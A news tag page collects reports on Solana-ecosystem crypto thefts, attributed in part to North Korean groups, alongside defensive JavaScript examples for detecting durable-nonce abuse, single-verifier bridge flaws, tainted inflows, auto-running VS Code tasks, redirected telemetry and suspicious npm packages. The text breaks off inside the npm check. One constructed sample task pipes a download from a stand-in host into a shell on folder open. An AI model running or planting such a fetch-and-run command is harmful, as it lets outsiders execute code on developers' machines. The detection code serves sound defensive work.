Tag: Solana

  • Two Strikes, Half a Billion: How North Korean Hackers Seized 76% of All Stolen Crypto in Just 120 Days

    North Korean cyber-operatives have once again demonstrated how a handful of precision strikes can fundamentally reshape annual cryptocurrency crime statistics. According to data from TRM Labs, between January and April 2026, groups affiliated with the Democratic People’s Republic of Korea (DPRK) accounted for 76% of all losses sustained via crypto-industry breaches, despite these losses originating from only two primary incidents.

    Analysts put the combined losses from the attacks on Drift Protocol and KelpDAO at approximately $577 million. The exploitation of Drift Protocol on April 1 netted the attackers $285 million, and the breach of the KelpDAO bridge on April 18 added another $292 million. Together, these two incidents were only a fraction of the total number of attacks in 2026, yet they gave North Korea the bulk of all stolen funds.

    TRM Labs notes that the DPRK's share of cryptocurrency theft has risen steadily for several years. In 2020 and 2021 the figure was below 10%; it rose to 22% in 2022, 37% in 2023, 39% in 2024, and 64% in 2025. The 2025 share was inflated by the February 2025 breach of Bybit, in which $1.46 billion was taken from a cold wallet, an event TRM Labs calls the largest cryptocurrency theft in history.

    The Drift Protocol operation stood out for its long preparation. TRM Labs assesses that the attackers began on-chain moves as early as March 11, after several months of social engineering aimed at project staff. The report adds that North Korean intermediaries went as far as meeting Drift representatives in person.

    The attackers then used Solana's durable nonce mechanism. A normal Solana transaction references a recent blockhash and is dropped once that blockhash ages out of the recent-blockhash queue, but a transaction built against a nonce account stays valid until the nonce is advanced, so it can be signed well in advance and broadcast whenever the attacker chooses, leaving no on-chain trace until that moment. On April 1, the pre-staged transactions drained the funds within a twelve-minute window. After quickly swapping the assets and bridging them to Ethereum, the attackers have so far left the stolen cryptocurrency untouched.
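    The lifetime difference that made pre-signing possible, as an added toy model (this is not @solana/web3.js and not Drift's code; ledger, accounts and the "treasury" signer are constructed, and one key acts as both fee payer and nonce authority for brevity). It shows a normal transaction expiring, a durable-nonce transaction surviving a thousand slots, the nonce being consumed so the same transaction cannot replay, and the defender's response: advancing every nonce account the treasury key controls, which kills any pre-signed transaction still held off-chain.

```javascript
// Toy model of Solana transaction lifetimes. Added example: not @solana/web3.js
// and not Drift's code. A normal transaction names a recent blockhash and is
// dropped once that hash ages out of the recent-blockhash queue (about 150
// slots). A durable-nonce transaction instead names the value stored in a nonce
// account and lists AdvanceNonceAccount as its first instruction, so it stays
// valid until the nonce is advanced. One key acts as fee payer and nonce
// authority here, which is a simplification. All data is constructed.

const MAX_BLOCKHASH_AGE = 150;

function createLedger() {
  return { slot: 0, blockhashes: [], nonceAccounts: new Map(), applied: [] };
}

function advanceSlot(ledger) {
  ledger.slot += 1;
  ledger.blockhashes.push(`hash-${ledger.slot}`); // stand-in for a real 32-byte hash
  if (ledger.blockhashes.length > MAX_BLOCKHASH_AGE) ledger.blockhashes.shift();
}

function createNonceAccount(ledger, address, authority) {
  ledger.nonceAccounts.set(address, { authority, seq: 0, value: `nonce-${address}-0` });
}

// Advancing the nonce invalidates every transaction signed against the old
// value, whether a friend or an attacker is holding it.
function advanceNonce(ledger, address, signer) {
  const acct = ledger.nonceAccounts.get(address);
  if (!acct || acct.authority !== signer) return false;
  acct.seq += 1;
  acct.value = `nonce-${address}-${acct.seq}`;
  return true;
}

// Build a signed transfer against either the latest blockhash or a nonce account.
function signTransaction(ledger, { signer, transfer, nonceAccount }) {
  if (nonceAccount) {
    const acct = ledger.nonceAccounts.get(nonceAccount);
    return {
      signer,
      recentBlockhash: acct.value,
      instructions: [{ type: 'AdvanceNonceAccount', nonceAccount }, transfer],
    };
  }
  const latest = ledger.blockhashes[ledger.blockhashes.length - 1];
  return { signer, recentBlockhash: latest, instructions: [transfer] };
}

// Validate a transaction the way the runtime would, then apply it.
function submit(ledger, tx) {
  const first = tx.instructions[0];
  if (first.type === 'AdvanceNonceAccount') {
    const acct = ledger.nonceAccounts.get(first.nonceAccount);
    if (!acct || acct.value !== tx.recentBlockhash) return 'rejected: stale nonce';
    if (acct.authority !== tx.signer) return 'rejected: not nonce authority';
    advanceNonce(ledger, first.nonceAccount, tx.signer); // consumed: cannot be replayed
  } else if (!ledger.blockhashes.includes(tx.recentBlockhash)) {
    return 'rejected: blockhash expired';
  }
  ledger.applied.push(tx);
  return 'applied';
}

// Defender's inventory: every nonce account a key controls is a place where a
// pre-signed, still-invisible transaction may be waiting.
function nonceAccountsControlledBy(ledger, authority) {
  return [...ledger.nonceAccounts].filter(([, a]) => a.authority === authority).map(([addr]) => addr);
}

function runScenario() {
  const ledger = createLedger();
  advanceSlot(ledger);
  createNonceAccount(ledger, 'nonceA', 'treasury');
  const transfer = { type: 'Transfer', from: 'treasury', to: 'attacker', lamports: 1 };
  const plain = signTransaction(ledger, { signer: 'treasury', transfer });
  const durable = signTransaction(ledger, { signer: 'treasury', transfer, nonceAccount: 'nonceA' });
  for (let i = 0; i < 1000; i++) advanceSlot(ledger); // attacker waits weeks
  const plainResult = submit(ledger, plain);     // expired long ago
  const durableResult = submit(ledger, durable); // still good
  const replayResult = submit(ledger, durable);  // nonce already consumed
  // Response: rotate every nonce the treasury key controls, so any other
  // pre-signed transaction in the attacker's hands dies unbroadcast.
  const held = signTransaction(ledger, { signer: 'treasury', transfer, nonceAccount: 'nonceA' });
  for (const addr of nonceAccountsControlledBy(ledger, 'treasury')) advanceNonce(ledger, addr, 'treasury');
  const afterRotation = submit(ledger, held);
  return { plainResult, durableResult, replayResult, afterRotation };
}

console.log(runScenario());
```

    The check a treasury operator can act on is the last step: if a signing key or a signer is suspected of having been social-engineered into signing something, list the nonce accounts that key is authority for and advance or close them, because the signed payload itself is invisible until it is broadcast.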

    In the KelpDAO case, the attackers targeted the rsETH LayerZero bridge. They compromised two internal RPC nodes and knocked the external nodes offline with a distributed denial-of-service (DDoS) attack, leaving the verifier dependent on the compromised nodes, which caused a forged cross-chain message to be accepted as valid.

    TRM Labs identifies the root cause as a single-verifier design with no requirement for independent confirmation from a second source. After the attack, the Arbitrum Security Council froze approximately $75 million; the attackers nonetheless converted roughly $175 million in ETH into Bitcoin, mostly through THORChain.
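    The failure mode and the fix, as an added model (not LayerZero's or KelpDAO's code; node behaviours, message ids and the verifier layout are constructed). A single verifier that takes the first RPC answer it gets accepts a forged message once the honest nodes are unreachable and only the compromised ones answer; independent verifiers with their own RPC sets, a quorum threshold, and "unreachable counts as no" reject the same message while still passing a genuine one.

```javascript
// Model of cross-chain message verification. Added example: not LayerZero's
// or KelpDAO's code; it only illustrates the single-verifier weakness the
// write-up describes. A verifier asks RPC nodes whether a message id was
// really emitted on the source chain. Node behaviour is constructed:
// 'honest' nodes read real source-chain state, 'compromised' nodes confirm
// anything, 'down' nodes (DDoSed) never answer.

const SOURCE_CHAIN_EVENTS = new Set(['msg-1', 'msg-2']); // constructed ground truth

function makeNode(name, mode) {
  return {
    name,
    query(messageId) {
      if (mode === 'down') return null;             // timeout
      if (mode === 'compromised') return true;      // attests to anything
      return SOURCE_CHAIN_EVENTS.has(messageId);    // honest
    },
  };
}

// Vulnerable pattern: one verifier, and whichever RPC node answers first decides.
// Taking the external nodes offline hands the decision to the internal ones.
function singleVerifierFirstResponse(nodes, messageId) {
  for (const node of nodes) {
    const answer = node.query(messageId);
    if (answer !== null) return answer;
  }
  return false; // nothing reachable
}

// Hardened pattern, part 1: a verifier only says yes when at least
// minAgreeingNodes reachable nodes answered and all of them agreed.
// Unreachable nodes never count as agreement.
function verifierVote(nodes, messageId, minAgreeingNodes) {
  const answers = nodes.map((n) => n.query(messageId)).filter((a) => a !== null);
  const yes = answers.filter(Boolean).length;
  return yes >= minAgreeingNodes && yes === answers.length;
}

// Hardened pattern, part 2: independent verifiers with separate RPC sets,
// and a threshold of them must vote yes.
function quorumVerify(verifiers, messageId, threshold) {
  const votes = verifiers.map((v) => verifierVote(v.nodes, messageId, v.minAgreeingNodes));
  return votes.filter(Boolean).length >= threshold;
}

function runScenario() {
  // Attack conditions from the write-up: two internal nodes compromised,
  // external nodes unreachable.
  const externalDown = [makeNode('ext-1', 'down'), makeNode('ext-2', 'down')];
  const internalOwned = [makeNode('int-1', 'compromised'), makeNode('int-2', 'compromised')];
  const bridgeVerifierNodes = [...externalDown, ...internalOwned];
  const forgedMessage = 'msg-forged'; // never emitted on the source chain

  const singleResult = singleVerifierFirstResponse(bridgeVerifierNodes, forgedMessage);

  // Same attack against a 2-of-3 quorum. Verifier 1 is the one the attackers
  // control; verifier 3 has lost a node to the DDoS and must still fail closed.
  const verifiers = [
    { nodes: bridgeVerifierNodes, minAgreeingNodes: 2 },
    { nodes: [makeNode('v2-a', 'honest'), makeNode('v2-b', 'honest')], minAgreeingNodes: 2 },
    { nodes: [makeNode('v3-a', 'down'), makeNode('v3-b', 'honest')], minAgreeingNodes: 2 },
  ];
  const quorumForged = quorumVerify(verifiers, forgedMessage, 2);
  const quorumGenuine = quorumVerify(verifiers, 'msg-1', 2);
  return { singleResult, quorumForged, quorumGenuine };
}

console.log(runScenario());
```

    Note what the DDoS buys the attacker in each design: against the single verifier it converts an availability problem into a forged-message acceptance; against the quorum it only costs verifier 3 its vote, which degrades liveness but not safety.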

    TRM Labs attributes the KelpDAO breach to the TraderTraitor collective, noting that a portion of the funds utilized to orchestrate the attack is traceable to a Bitcoin wallet belonging to Wu Huihui, a Chinese cryptocurrency broker indicted in 2023 for laundering assets on behalf of Lazarus. The firm estimates that the cumulative volume of cryptocurrency stolen by North Korean entities since 2017 has now surpassed $6 billion.

    TRM Labs urges exchanges and DeFi projects to treat THORChain, cross-chain bridges, and Solana multi-signature wallets as elevated-risk channels. It recommends auditing all April inflows, with particular attention to Bitcoin arriving from THORChain swaps and to any assets linked to the addresses involved in the Drift and KelpDAO thefts.
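    One way to run the inflow audit described above, as an added example (not TRM Labs' tooling; the listed addresses, labels and transfer graph are constructed stand-ins for what an attribution feed and chain data would supply). A deposit is flagged when the funds behind it trace back to a listed address within a bounded number of hops, or when a THORChain swap sits on the path; a flag means manual review, since THORChain is also a legitimate venue.

```javascript
// Inflow screening by provenance. Added example: not TRM Labs' tooling. A
// deposit is flagged when the funds behind it trace back to a listed address
// within a few hops, or when a THORChain swap appears on the path. The
// addresses, labels and transfer graph are constructed; real screening would
// pull them from chain data and an attribution provider.

const LISTED = new Set(['drift-exploiter-1', 'kelp-exploiter-1']); // constructed labels

// Transfer graph: from -> to, with the venue that carried the transfer.
const TRANSFERS = [
  { from: 'kelp-exploiter-1', to: 'hop-a',            via: 'ethereum'  },
  { from: 'hop-a',            to: 'thorchain-swap-1', via: 'ethereum'  },
  { from: 'thorchain-swap-1', to: 'btc-hop-b',        via: 'thorchain' },
  { from: 'btc-hop-b',        to: 'deposit-addr-X',   via: 'bitcoin'   },
  { from: 'clean-user',       to: 'deposit-addr-Y',   via: 'bitcoin'   },
  { from: 'thorchain-swap-2', to: 'deposit-addr-Z',   via: 'thorchain' },
];

function buildReverseGraph(transfers) {
  const incoming = new Map();
  for (const t of transfers) {
    if (!incoming.has(t.to)) incoming.set(t.to, []);
    incoming.get(t.to).push(t);
  }
  return incoming;
}

// Breadth-first walk backwards from the deposit address, at most maxHops deep.
function screenDeposit(incoming, depositAddress, maxHops = 4) {
  const queue = [{ address: depositAddress, hops: 0 }];
  const seen = new Set([depositAddress]);
  const reasons = [];
  let viaThorchain = false;
  while (queue.length > 0) {
    const { address, hops } = queue.shift();
    if (LISTED.has(address)) reasons.push(`funds traced to listed address ${address} in ${hops} hops`);
    if (hops === maxHops) continue;
    for (const t of incoming.get(address) || []) {
      if (t.via === 'thorchain') viaThorchain = true;
      if (!seen.has(t.from)) {
        seen.add(t.from);
        queue.push({ address: t.from, hops: hops + 1 });
      }
    }
  }
  if (viaThorchain) reasons.push('path includes a THORChain swap');
  return { address: depositAddress, flagged: reasons.length > 0, reasons };
}

// Screen every deposit address seen in the audit period.
function screenInflows(transfers, depositAddresses, maxHops = 4) {
  const incoming = buildReverseGraph(transfers);
  return depositAddresses.map((a) => screenDeposit(incoming, a, maxHops));
}

console.log(screenInflows(TRANSFERS, ['deposit-addr-X', 'deposit-addr-Y', 'deposit-addr-Z']));
```

    The hop limit is the knob that matters: deposit-addr-X is four hops from the listed address, so a limit of three would miss the attribution and leave only the THORChain flag, which is why the two signals are scored independently.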

  • The Long Game: How North Korea’s UNC4736 Spent Six Months Infiltrating Drift for a $285M Payday

    The recent breach of the Solana-based Drift Protocol, which ended with $285 million taken, was not an opportunistic hit but the conclusion of a carefully planned operation that ran for nearly half a year. Behind ordinary professional conversations lay a patient infiltration in which trust itself was the main tool.

    Drift, which is built on the Solana blockchain, has attributed the attack to the North Korean group UNC4736, also tracked as AppleJeus and Golden Chollima. According to the company's own findings, the groundwork was laid as early as autumn 2025: attackers posing as representatives of a well-known trading firm introduced themselves to members of the ecosystem at industry conferences and gradually built a professional relationship.

    The encounters were convincing; the operators showed a deep understanding of the market, backed by detailed backstories and well-maintained professional profiles. After these first meetings, a Telegram group was set up to discuss integrations and funding strategies. In December the attackers deposited more than a million dollars into a vault on the platform, a calculated move that reinforced their credibility and secured a foothold in the ecosystem.

    By early 2026 the relationship had moved on to exchanging technical tools and source code. According to one forensic theory, a developer built a project from a repository the attackers supplied, in which a hidden execution hook sat in the Visual Studio Code workspace configuration. Another participant installed a beta build of a cryptocurrency wallet through TestFlight. Either path could have provided the initial access to core infrastructure.
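    A check for the repository-side hook, as an added example (not Drift's tooling, and not a claim about the exact hook used against them; both sample files are constructed). A cloned repository can carry a .vscode/tasks.json task with runOptions.runOn set to "folderOpen", which VS Code runs when a trusted folder is opened, or a settings.json that points the editor or an extension at an executable inside the repository. Both files are JSON with comments and trailing commas, so the scanner normalises them before parsing.

```javascript
// Scanner for auto-executing Visual Studio Code workspace configuration.
// Added example: not Drift's tooling and not a description of the exact hook
// used against them. A repository can ship .vscode/tasks.json with a task whose
// runOptions.runOn is "folderOpen"; VS Code runs such tasks when a trusted
// folder is opened. Settings files can likewise point the editor or its
// extensions at an executable inside the repository. Both files are JSON with
// comments and trailing commas, so they are normalised before parsing. The
// sample files below are constructed.

function stripJsonComments(text) {
  let out = '';
  let inString = false;
  for (let i = 0; i < text.length; ) {
    const ch = text[i];
    const next = text[i + 1];
    if (inString) {
      out += ch;
      if (ch === '\\') { out += next === undefined ? '' : next; i += 2; continue; }
      if (ch === '"') inString = false;
      i += 1;
      continue;
    }
    if (ch === '"') { inString = true; out += ch; i += 1; continue; }
    if (ch === '/' && next === '/') { while (i < text.length && text[i] !== '\n') i += 1; continue; }
    if (ch === '/' && next === '*') { const end = text.indexOf('*/', i + 2); i = end === -1 ? text.length : end + 2; continue; }
    out += ch;
    i += 1;
  }
  return out;
}

function parseJsonc(text) {
  return JSON.parse(stripJsonComments(text).replace(/,(\s*[}\]])/g, '$1'));
}

// Tasks that VS Code will run as soon as the folder is opened.
function findAutoRunTasks(tasksJsonText) {
  const doc = parseJsonc(tasksJsonText);
  return (doc.tasks || [])
    .filter((t) => t.runOptions && t.runOptions.runOn === 'folderOpen')
    .map((t) => ({ label: t.label, type: t.type, command: t.command, args: t.args || [] }));
}

// settings.json keys that name an executable or toolchain path; a value
// committed by a third party can point at a script inside the repository.
// Some (typescript.tsdk) are often legitimate, so this lists them for review.
const EXECUTABLE_SETTINGS = [
  'git.path',
  'terminal.integrated.profiles.linux',
  'terminal.integrated.profiles.osx',
  'terminal.integrated.profiles.windows',
  'python.defaultInterpreterPath',
  'typescript.tsdk',
];

function findExecutableSettings(settingsJsonText) {
  const doc = parseJsonc(settingsJsonText);
  return Object.keys(doc).filter((k) => EXECUTABLE_SETTINGS.includes(k));
}

// Constructed .vscode/tasks.json showing the hook pattern.
const SAMPLE_TASKS = `{
  // build tasks
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "setup",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -s https://example.invalid/s | sh"],
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}`;

// Constructed .vscode/settings.json pointing git at a script in the repo.
const SAMPLE_SETTINGS = `{
  "editor.tabSize": 2, /* harmless */
  "git.path": "./tools/git.sh",
  "typescript.tsdk": "./node_modules/typescript/lib"
}`;

console.log(findAutoRunTasks(SAMPLE_TASKS), findExecutableSettings(SAMPLE_SETTINGS));
```

    Run this over the .vscode directory of any third-party repository before opening it in an editor. The control that keeps such tasks from firing is Workspace Trust (Restricted Mode); the scanner is for teams that habitually trust cloned folders, which is exactly the habit a six-month relationship is built to exploit.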

    After the strike, the traces disappeared quickly: chat histories and malicious files were deleted. Drift notes that the operation resembled a full-scale reconnaissance campaign, complete with prepared personas and elaborate logistics.

    CrowdStrike analysts have previously linked Golden Chollima to a series of attacks on fintech firms worldwide. The group operates on a sustained basis and is a major revenue channel for the DPRK's funding programs. DomainTools, meanwhile, has documented a shift in how North Korean cyber-operations are organised: the monolithic structure has become a distributed ecosystem in which separate groups handle espionage, theft, and disruptive attacks, a decentralised model that limits the damage to the whole if a single operation is exposed.

    Social engineering remains the core of their tradecraft. Campaigns such as Contagious Interview, and schemes using fake IT workers, gain access to corporate networks under the guise of recruitment or technical assessments. They rely on an international network of intermediaries and proxy candidates, with payments frequently made in cryptocurrency.

    The Drift case shows how far these methods have evolved. Rather than a frontal assault, the attackers chose to embed themselves slowly in the system, making trust and professional relationships the primary attack vector.

  • Solana Under Siege: Step Finance Drained of $30M as STEP Token Plummets 80% in Hours

    A major attack within the Solana ecosystem has shaken the decentralized finance sector. The Step Finance platform disclosed a compromise of its operational wallets in which approximately $30 million in assets was drained from project reserves; the associated token fell more than 80% within a few hours.

    The Step Finance team explained that the attackers gained access to several treasury and fee wallets at the same time. According to the disclosure, approximately 261,854 SOL were moved to attacker-controlled addresses. User wallets were not affected: the attack targeted only the protocol's internal funds. The team says a full investigation is under way with the help of leading cybersecurity firms.

    Market reaction was instantaneous. According to cryptocurrency valuation aggregators, the STEP token collapsed to the $0.004 threshold. The project’s market capitalization evaporated to approximately $1.3 million, relegating it to the status of a micro-cap asset. Liquidity vanished as price volatility intensified; while trading had remained relatively sedate prior to the incident, the subsequent trajectory revealed a vertical descent devoid of discernible support levels. Transient rebounds proved insufficient to arrest the overarching bearish momentum.

    Fee revenue on the protocol had spiked in early 2025 to $150,000–$160,000 per day, a pattern usually attributed to speculative activity. Since the compromise, those figures and trading volumes have fallen sharply. The current price reflects cautious, risk-averse buying and a deep loss of investor confidence rather than any concerted recovery.

    Similar attacks have repeatedly hit DeFi projects built on Solana. Common root causes include compromised operational wallets, leaked private keys, and failures of access control. In earlier cases, projects have lost millions through takeover of administrative accounts or inadequate oversight of privileged operations.

  • How a Hidden Backdoor Drained $7M from Trust Wallet

    A dangerous vulnerability has been discovered in the Trust Wallet browser extension, potentially allowing attackers to steal users’ cryptocurrency. The issue affected version 2.68, and the wallet’s team officially urged everyone who had installed it to immediately disable the extension and update to version 2.69.

    The first complaints were reported by researcher ZachXBT, who wrote that “several Trust Wallet users have reported funds being stolen from their wallets over the past few hours.” Shortly thereafter, Trust Wallet confirmed the risk was specific to browser version 2.68 and issued guidance to move to the patched release.

    A detailed analysis of the incident was published by SlowMist, a firm specializing in blockchain security. Its researchers compared the code in versions 2.67 and 2.68 and identified an insertion resembling a backdoor. According to their findings, the malicious component iterated through wallets stored in the extension and requested each wallet’s seed phrase. It then used either the password entered by the user to unlock the wallet, or an alternative unlock mechanism via passkeyPassword, to decrypt the data and prepare it for exfiltration.

    A crucial clue lay in the attackers’ domain infrastructure. SlowMist reported that seed phrases and other sensitive information were sent to api.metrics-trustwallet[.]com, associated with the domain metrics-trustwallet.com. Researchers found that this domain was registered on December 8, 2025, with the first requests observed starting December 21—dates that align closely with the suspected insertion of the malicious code into the extension.

    Dynamic analysis revealed a particularly subtle technique. After the wallet was unlocked, the seed phrase was placed into the errorMessage field—data that appears to be a benign technical error. This payload was then transmitted to the attackers’ server as part of an otherwise ordinary network request. SlowMist also noted that the attackers leveraged the legitimate PostHog analytics library, but redirected analytics traffic to their own server, disguising the data leak as routine telemetry.
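    The review that would have caught the change between 2.67 and 2.68, as an added example (not SlowMist's tooling; the allowlist and both build sources are constructed stand-ins). It extracts the hostnames from URL literals in two builds, diffs them, classifies each new host as allowed, a brand-lookalike (contains the vendor name but its registrable domain is not the vendor's, the shape of api.metrics-trustwallet[.]com) or unknown, and lists where PostHog's api_host option points, since that is the knob that redirected the "telemetry".

```javascript
// Outbound-host review for a browser-extension release. Added example: not
// SlowMist's tooling. It pulls hostnames out of URL literals in two builds'
// JavaScript, diffs them, and classifies each new host. It also lists where
// PostHog's api_host option points, since the write-up describes analytics
// traffic being redirected. The allowlist and both sources are constructed.

const BRAND = 'trustwallet';
const ALLOWED_DOMAINS = new Set(['trustwallet.com', 'posthog.com']); // assumed allowlist

function extractHosts(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return hosts;
}

// Registrable domain as "last two labels". Real tooling should use the
// Public Suffix List (co.uk, com.au, ...); enough for the .com cases here.
function registrableDomain(host) {
  return host.split('.').slice(-2).join('.');
}

function classifyHost(host) {
  const domain = registrableDomain(host);
  if (ALLOWED_DOMAINS.has(domain)) return 'allowed';
  if (domain.includes(BRAND)) return 'brand-lookalike'; // vendor-like name, not the vendor's domain
  return 'unknown';
}

function diffOutboundHosts(oldSource, newSource) {
  const before = extractHosts(oldSource);
  const after = extractHosts(newSource);
  return {
    added: [...after].filter((h) => !before.has(h)).map((h) => ({ host: h, verdict: classifyHost(h) })),
    removed: [...before].filter((h) => !after.has(h)),
  };
}

// PostHog's browser SDK is configured with posthog.init(key, { api_host }).
// An api_host that is not the analytics vendor's own endpoint means the
// events, errorMessage field included, are going somewhere else.
function posthogApiHosts(source) {
  const out = [];
  const re = /api_host\s*:\s*['"]([^'"]+)['"]/g;
  let m;
  while ((m = re.exec(source)) !== null) out.push(m[1]);
  return out;
}

// Constructed stand-ins for two consecutive builds.
const BUILD_A = `
  posthog.init("phc_key", { api_host: "https://app.posthog.com" });
  fetch("https://api.trustwallet.com/v1/prices");
`;
const BUILD_B = `
  posthog.init("phc_key", { api_host: "https://api.metrics-trustwallet.com" });
  fetch("https://api.trustwallet.com/v1/prices");
`;

console.log(diffOutboundHosts(BUILD_A, BUILD_B), posthogApiHosts(BUILD_B));
```

    The same diff belongs in the release pipeline, not only in post-incident analysis: a new outbound host in a wallet build is a change that should block publication until someone can say what it is for.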

    At the time of publication, SlowMist estimated that total losses could reach into the millions of dollars. Indicative figures include approximately 33 BTC—roughly $3 million—as well as around $3 million on Ethereum networks, including layer-2 solutions. Losses on Solana were significantly smaller, amounting to only a few hundred dollars. After the thefts, the funds were reportedly laundered through several centralized exchanges and cross-chain bridges.

    Researchers emphasized that this incident does not resemble a compromised third-party dependency, such as a malicious npm package, but rather appears to be a direct modification of the extension’s own code. From this, SlowMist concludes that the attack was likely orchestrated by professionals who may have gained prior access to the development environment or the extension’s publishing pipeline.

    Users who installed the Trust Wallet extension are advised to proceed with extreme caution. Stop using the extension and move funds as quickly as possible to a wallet you trust. Because the backdoor exfiltrated seed phrases, backing up the existing phrase is not enough: the destination should be a wallet generated from a fresh seed, and the old seed should be treated as burned. If compromise is suspected, avoid entering the old seed phrase anywhere else on the affected device, since any action taken there may make the situation worse.

  • Upbit Solana Hack: 100 Billion Tokens Stolen, Exchange Delay Avoids Penalties

    Hackers siphoned more than 100 billion tokens from Upbit in just 54 minutes, exploiting a flaw in the exchange's handling of Solana-based assets. During this brief window, roughly 44.5 billion won (~$30.6 million) in digital assets were funneled into unknown external wallets. Yet the exchange notified authorities only six hours after detecting the breach, and regulators now find themselves unable to impose penalties because of a gap in current legislation. According to data the Financial Supervisory Service provided to Assemblyman Kang Min-guk, the attack began at 4:42 a.m. and ended at 5:36, affecting 24 Solana-ecosystem tokens. On average, the attackers were moving about 32 million coins per second.

    The largest volume was in the BONK token: more than 103.1 billion coins, over 99% of all stolen tokens by count, though the largest loss by value was in SOL itself, nearly 1.9 billion won (~$1.3 million). Pudgy Penguin, Official Trump, and other assets were also hit. The response timeline shows that by 5:00 Upbit had convened an emergency meeting; within minutes it restricted operations involving Solana-based assets, and by 8:55 all trading was halted. Even so, the first official notice to the financial regulator was not sent until 10:58.

    Despite the delay, penalizing the exchange is nearly impossible: existing rules contain no provisions allowing direct sanctions against virtual-asset operators for security incidents. The FSS is conducting an on-site investigation, but the prospect of meaningful measures remains uncertain. Upbit maintains that no users suffered losses: the company claims it reimbursed the entire stolen amount and notified authorities as soon as the breach was conclusively verified.

  • $41 Million Stolen in SwissBorg Crypto Hack Linked to Third-Party API

    The Swiss crypto platform SwissBorg has confirmed a breach in which attackers siphoned off approximately 193,000 Solana (SOL) tokens from its Earn program. At the time of the incident, the stolen assets were valued at nearly $41 million.

    In an official statement, the company stressed that the attack affected fewer than 1% of users and did not impact other Earn programs or funds within the app. According to SwissBorg, its core infrastructure remains secure, and daily operations continue uninterrupted.

    The breach was traced to a vulnerability in the API of Kiln, a staking infrastructure provider for Solana and Ethereum. Through this compromised API, SwissBorg’s application communicated with the Solana network, enabling the attackers to manipulate requests and withdraw assets.

    The company’s CEO, Cyrus Fazel, speaking in an X Space session, acknowledged the severity of the loss but emphasized that SwissBorg itself remains financially sound: “The incident affected around 1% of our client base and approximately 2% of assets under management. It is a large sum, but it does not put the company at risk.”

    SwissBorg has pledged to cover the losses using its own SOL Treasury and confirmed that it is collaborating with international agencies, cryptocurrency exchanges, and white-hat hackers to recover the stolen funds. The company reported that some transactions had already been frozen.

    In its published recovery plan, SwissBorg outlined two immediate courses of action. First, affected users will be compensated promptly with funds from the SOL Treasury. Second, the company, alongside security experts, will continue efforts to retrieve the stolen assets. Impacted clients will be notified individually via email.

    The Solana Earn program allowed users to earn rewards through staking facilitated by Kiln’s infrastructure. It was part of SwissBorg’s broader Earn product suite, which also includes offerings for BTC and ETH, primarily aimed at retail investors.

    Blockchain data shows that the stolen tokens were transferred to an address now flagged as “SwissBorg Exploiter.” This wallet currently holds more than 190,000 SOL (approximately $40.8 million), and users have been cautioned to exercise extreme vigilance when encountering it.

  • Malicious NPM Packages Target Solana Devs, Leaking Data to a “U.S.-Based” Server

    Researchers have uncovered a new politically tinged campaign targeting the Solana blockchain ecosystem and, apparently, developers of cryptocurrency projects in Russia. Specialists at Safety, a company focused on securing software supply chains, identified a cluster of malicious NPM packages disguised as legitimate tools for working with the Solana SDK. In reality, they were delivering an infostealer—malware designed to harvest data from compromised devices.

    The counterfeit packages, published under the names solana-pump-test and solana-spl-sdk, appeared in the official NPM registry and were attributed to an account with the alias cryptohan and the email crypto2001813@gmail[.]com. Analysts believe the pseudonym was selected to lend credibility and is not tied to a real individual. Notably, one of the packages received 14 updates within just ten hours of its release on August 15, signaling active refinement and a likely attempt by the operators to obscure their tracks.

    Once installed, the packages initiated scans of key system directories—home, Documents, Downloads, Desktop, and attached drives on Windows—seeking both general user data and potential crypto assets. Exfiltrated information was transmitted to a command-and-control (C2) server located in the United States. However, investigators also traced IP addresses registered in Moscow within the attackers’ infrastructure, leaving it unclear whether these belonged to infected victims or reflected direct activity by the campaign’s operators.

    The geopolitical dimension adds intrigue: infrastructure based in the U.S., but with victims reportedly concentrated in Russia. On this basis, researchers cautiously suggest the possible involvement of state-aligned actors.

    Additional indicators point to the use of generative AI tools in crafting the malicious code. Console logs contained nonstandard messages featuring emojis—an unusual marker strongly suggestive of text generated by models such as Claude. Such stylistic quirks are atypical in manually written malicious JavaScript, bolstering the hypothesis of automated development techniques.

    Dubbed Solana-Scan, the campaign highlights how the blockchain ecosystem is becoming an increasingly attractive target for cybercriminals. Malicious dependency packages remain a highly effective delivery vector for infostealers. For developers, this underscores the necessity of rigorously vetting external libraries and monitoring their sources, as even widely trusted registries cannot guarantee immunity from tampering.
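    Two of the signals in this report can be checked before a dependency is installed, as an added example (not Safety's scanner; the package.json and registry metadata below are constructed, though the package name is the one the report gives, and the thresholds are assumptions). It reads lifecycle scripts that run on install from package.json, and uses the registry metadata document's "time" map to spot a package whose versions were pushed in a burst right after it first appeared, the fourteen-updates-in-ten-hours pattern above.

```javascript
// Pre-install checks for an npm dependency. Added example: not Safety's
// scanner. Two signals from the write-up are checked: lifecycle scripts that
// execute on install, and a package whose versions were pushed in a burst
// right after it first appeared. Inputs are the package's package.json and its
// registry metadata document (https://registry.npmjs.org/<name>), whose "time"
// field maps "created", "modified" and each version to a publish timestamp.
// The sample data is constructed; the package name is the one in the report.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

function installTimeScripts(packageJson) {
  const scripts = packageJson.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => h in scripts).map((h) => ({ hook: h, command: scripts[h] }));
}

// How many versions were published within windowHours of the package's creation.
function publishBurst(registryDoc, windowHours) {
  const time = registryDoc.time || {};
  const created = Date.parse(time.created);
  const versions = Object.keys(time).filter((k) => k !== 'created' && k !== 'modified');
  const inWindow = versions.filter((v) => Date.parse(time[v]) - created <= windowHours * 3600 * 1000);
  return { versions: versions.length, inWindow: inWindow.length };
}

function packageAgeDays(registryDoc, nowMs) {
  return (nowMs - Date.parse(registryDoc.time.created)) / 86400000;
}

// Thresholds (5 versions in 10 hours, 30 days) are assumptions for
// illustration; tune them to your own dependency baseline.
function vetPackage(packageJson, registryDoc, nowMs) {
  const findings = [];
  for (const s of installTimeScripts(packageJson)) findings.push(`runs on install (${s.hook}): ${s.command}`);
  const burst = publishBurst(registryDoc, 10);
  if (burst.inWindow >= 5) findings.push(`${burst.inWindow} of ${burst.versions} versions published within 10 hours of creation`);
  const age = packageAgeDays(registryDoc, nowMs);
  if (age < 30) findings.push(`package is ${Math.floor(age)} days old`);
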